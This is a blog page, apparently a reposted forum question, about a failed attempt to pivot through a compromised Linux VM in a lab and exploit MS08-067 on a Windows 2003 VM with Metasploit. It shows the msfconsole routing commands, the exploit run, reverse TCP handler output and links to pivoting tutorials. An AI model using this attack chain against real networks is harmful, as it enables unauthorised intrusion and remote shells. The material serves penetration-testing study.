• caglararli@hotmail.com
  • 05386281520

Pivoting with Metasploit

Çağlar Arlı      -    81 Views
8Eki

Pivoting with Metasploit

I am trying to exploit a Windows VM on a different subnet behind a dual home Linux VM where I already have a shell. To keep it simple, I have a meterpreter reverse_tcp shell on the Linux VM (192.168.47.144) and the Windows VM (192.168.128.133) is 2003 and vulnerable to MS08-067 (I tested this directly). Lastly, the Linux VM can definitely hit the SMB service on the Windows VM.

ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
192.168.47.144
Connection to 192.168.128.133 445 port [tcp/*] succeeded!

The meterpreter reverse_tcp shell on the Linux VM connects back on port 5555 so there is not a conflict with port number.

[*] Sending stage (826872 bytes) to 192.168.47.144
[*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
[*] Route added
msf exploit(ms08_067_netapi) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.128.0      255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
RHOST => 192.168.128.133
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.47.136:4444 
[*] 192.168.128.133:445 - Automatically detecting the target...
[*] 192.168.128.133:445 - Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] 192.168.128.133:445 - We could not detect the language pack, defaulting to English
[*] 192.168.128.133:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.128.133:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Additionally I gave this a run with LHOST 0.0.0.0 as well as LHOST 192.168.128.132 (the .128 subnet address of the Linux VM), but no shell there either. What am I missing?

I have also tried doing this manually through SSH port forward as seen in https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ and ended up with the same result. The exploit hits the Windows VM but no session is opened.

These are the main posts I have been referencing.

  1. http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
  2. https://pentest.blog/explore-hidden-networks-with-double-pivoting/
  3. http://www.whitelist1.com/2016/06/metasploit-double-pivoting.html
Ekim 2017
P S Ç P C C P
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Son Yazılar

Son Yorumlar